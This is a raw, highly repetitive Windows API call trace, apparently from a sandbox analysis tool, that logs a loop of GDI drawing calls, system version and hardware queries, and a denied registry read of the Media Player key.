[0087.890] CreateSolidBrush (color=0xff) returned 0x2100d64 [0087.890] CreateSolidBrush (color=0xff0000) returned 0x1100d67 [0087.890] DeleteObject (ho=0x1100d67) returned 1 [0087.890] DeleteObject (ho=0x290401cd) returned 1 [0087.890] DeleteObject (ho=0x270401d0) returned 1 [0087.890] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.890] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.890] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.890] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.890] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.890] BeginPath (hdc=0x0) returned 0 [0087.890] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.890] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.890] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.890] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.890] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.890] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.891] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.891] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.891] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2a0401cd [0087.891] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x280401d0 [0087.891] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d68 [0087.891] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d69 [0087.891] CombineRgn (hrgnDst=0x1040d68, hrgnSrc1=0x2a0401cd, hrgnSrc2=0x280401d0, iMode=1) returned 1 [0087.891] CombineRgn (hrgnDst=0x1040d69, hrgnSrc1=0x2a0401cd, hrgnSrc2=0x280401d0, iMode=4) returned 2 [0087.891] CreateSolidBrush (color=0xff) returned 0x2100d67 [0087.891] CreateSolidBrush (color=0xff0000) returned 0x1100d6a [0087.891] DeleteObject (ho=0x1100d6a) returned 1 [0087.891] DeleteObject (ho=0x280401d0) returned 1 [0087.891] DeleteObject (ho=0x2a0401cd) returned 1 [0087.891] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.891] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.891] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.891] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.891] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.891] BeginPath (hdc=0x0) returned 0 [0087.891] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.891] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.891] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.891] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.891] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.891] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.891] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.891] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.067] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x290401d0 [0088.067] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2b0401cd [0088.067] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040df5 [0088.067] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040df6 [0088.067] CombineRgn (hrgnDst=0x1040df5, hrgnSrc1=0x290401d0, hrgnSrc2=0x2b0401cd, iMode=1) returned 1 [0088.067] CombineRgn (hrgnDst=0x1040df6, hrgnSrc1=0x290401d0, hrgnSrc2=0x2b0401cd, iMode=4) returned 2 [0088.067] CreateSolidBrush (color=0xff) returned 0x2100d6a [0088.067] CreateSolidBrush (color=0xff0000) returned 0x1100df7 [0088.067] DeleteObject (ho=0x1100df7) returned 1 [0088.068] DeleteObject (ho=0x2b0401cd) returned 1 [0088.068] DeleteObject (ho=0x290401d0) returned 1 [0088.068] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.068] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.068] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.068] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.068] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.068] BeginPath (hdc=0x0) returned 0 [0088.068] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.068] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.068] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.068] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.068] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.068] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.068] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.068] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.068] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2c0401cd [0088.068] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2a0401d0 [0088.068] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040df8 [0088.068] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040df9 [0088.068] CombineRgn (hrgnDst=0x1040df8, hrgnSrc1=0x2c0401cd, hrgnSrc2=0x2a0401d0, iMode=1) returned 1 [0088.068] CombineRgn (hrgnDst=0x1040df9, hrgnSrc1=0x2c0401cd, hrgnSrc2=0x2a0401d0, iMode=4) returned 2 [0088.068] CreateSolidBrush (color=0xff) returned 0x2100df7 [0088.068] CreateSolidBrush (color=0xff0000) returned 0x1100dfa [0088.068] DeleteObject (ho=0x1100dfa) returned 1 [0088.068] DeleteObject (ho=0x2a0401d0) returned 1 [0088.068] DeleteObject (ho=0x2c0401cd) returned 1 [0088.068] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.068] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.068] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.068] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.068] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.068] BeginPath (hdc=0x0) returned 0 [0088.068] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.068] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.068] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.069] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.069] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.069] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.069] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.069] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.069] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2b0401d0 [0088.069] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2d0401cd [0088.069] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dfb [0088.069] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dfc [0088.069] CombineRgn (hrgnDst=0x1040dfb, hrgnSrc1=0x2b0401d0, hrgnSrc2=0x2d0401cd, iMode=1) returned 1 [0088.069] CombineRgn (hrgnDst=0x1040dfc, hrgnSrc1=0x2b0401d0, hrgnSrc2=0x2d0401cd, iMode=4) returned 2 [0088.069] CreateSolidBrush (color=0xff) returned 0x2100dfa [0088.069] CreateSolidBrush (color=0xff0000) returned 0x1100dfd [0088.069] DeleteObject (ho=0x1100dfd) returned 1 [0088.069] DeleteObject (ho=0x2d0401cd) returned 1 [0088.069] DeleteObject (ho=0x2b0401d0) returned 1 [0088.069] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.069] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.069] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.069] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.069] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.069] BeginPath (hdc=0x0) returned 0 [0088.069] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.069] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.069] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.069] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.069] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.069] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.069] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.069] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.069] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2e0401cd [0088.069] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2c0401d0 [0088.070] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dfe [0088.070] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dff [0088.070] CombineRgn (hrgnDst=0x1040dfe, hrgnSrc1=0x2e0401cd, hrgnSrc2=0x2c0401d0, iMode=1) returned 1 [0088.070] CombineRgn (hrgnDst=0x1040dff, hrgnSrc1=0x2e0401cd, hrgnSrc2=0x2c0401d0, iMode=4) returned 2 [0088.070] CreateSolidBrush (color=0xff) returned 0x2100dfd [0088.070] CreateSolidBrush (color=0xff0000) returned 0x1100e00 [0088.070] DeleteObject (ho=0x1100e00) returned 1 [0088.070] DeleteObject (ho=0x2c0401d0) returned 1 [0088.070] DeleteObject (ho=0x2e0401cd) returned 1 [0088.070] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.070] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.070] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.070] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.070] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.070] BeginPath (hdc=0x0) returned 0 [0088.070] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.070] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.070] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.070] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.070] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.070] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.070] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.070] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.070] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2d0401d0 [0088.070] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2f0401cd [0088.070] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e01 [0088.070] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e02 [0088.070] CombineRgn (hrgnDst=0x1040e01, hrgnSrc1=0x2d0401d0, hrgnSrc2=0x2f0401cd, iMode=1) returned 1 [0088.070] CombineRgn (hrgnDst=0x1040e02, hrgnSrc1=0x2d0401d0, hrgnSrc2=0x2f0401cd, iMode=4) returned 2 [0088.070] CreateSolidBrush (color=0xff) returned 0x2100e00 [0088.070] CreateSolidBrush (color=0xff0000) returned 0x1100e03 [0088.070] DeleteObject (ho=0x1100e03) returned 1 [0088.071] DeleteObject (ho=0x2f0401cd) returned 1 [0088.071] DeleteObject (ho=0x2d0401d0) returned 1 [0088.071] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.071] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.071] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.071] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.071] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.071] BeginPath (hdc=0x0) returned 0 [0088.071] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.071] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.071] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.071] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.071] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.071] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.071] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.071] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.071] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x300401cd [0088.071] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2e0401d0 [0088.071] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e04 [0088.071] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e05 [0088.071] CombineRgn (hrgnDst=0x1040e04, hrgnSrc1=0x300401cd, hrgnSrc2=0x2e0401d0, iMode=1) returned 1 [0088.071] CombineRgn (hrgnDst=0x1040e05, hrgnSrc1=0x300401cd, hrgnSrc2=0x2e0401d0, iMode=4) returned 2 [0088.071] CreateSolidBrush (color=0xff) returned 0x2100e03 [0088.071] CreateSolidBrush (color=0xff0000) returned 0x1100e06 [0088.071] DeleteObject (ho=0x1100e06) returned 1 [0088.071] DeleteObject (ho=0x2e0401d0) returned 1 [0088.071] DeleteObject (ho=0x300401cd) returned 1 [0088.071] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.071] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.071] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.071] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.071] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.071] BeginPath (hdc=0x0) returned 0 [0088.071] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.071] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.071] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.071] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.072] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.072] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.072] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.072] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.072] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2f0401d0 [0088.072] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x310401cd [0088.072] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e07 [0088.072] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e08 [0088.072] CombineRgn (hrgnDst=0x1040e07, hrgnSrc1=0x2f0401d0, hrgnSrc2=0x310401cd, iMode=1) returned 1 [0088.072] CombineRgn (hrgnDst=0x1040e08, hrgnSrc1=0x2f0401d0, hrgnSrc2=0x310401cd, iMode=4) returned 2 [0088.072] CreateSolidBrush (color=0xff) returned 0x2100e06 [0088.072] CreateSolidBrush (color=0xff0000) returned 0x1100e09 [0088.072] DeleteObject (ho=0x1100e09) returned 1 [0088.072] DeleteObject (ho=0x310401cd) returned 1 [0088.072] DeleteObject (ho=0x2f0401d0) returned 1 [0088.072] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.072] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.072] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.072] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.072] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.072] BeginPath (hdc=0x0) returned 0 [0088.072] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.072] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.072] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.072] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.072] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.072] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.072] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.072] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.072] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x320401cd [0088.072] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x300401d0 [0088.072] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e0a [0088.073] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e0b [0088.073] CombineRgn (hrgnDst=0x1040e0a, hrgnSrc1=0x320401cd, hrgnSrc2=0x300401d0, iMode=1) returned 1 [0088.073] CombineRgn (hrgnDst=0x1040e0b, hrgnSrc1=0x320401cd, hrgnSrc2=0x300401d0, iMode=4) returned 2 [0088.073] CreateSolidBrush (color=0xff) returned 0x2100e09 [0088.073] CreateSolidBrush (color=0xff0000) returned 0x1100e0c [0088.073] DeleteObject (ho=0x1100e0c) returned 1 [0088.073] DeleteObject (ho=0x300401d0) returned 1 [0088.073] DeleteObject (ho=0x320401cd) returned 1 [0088.073] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.073] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, 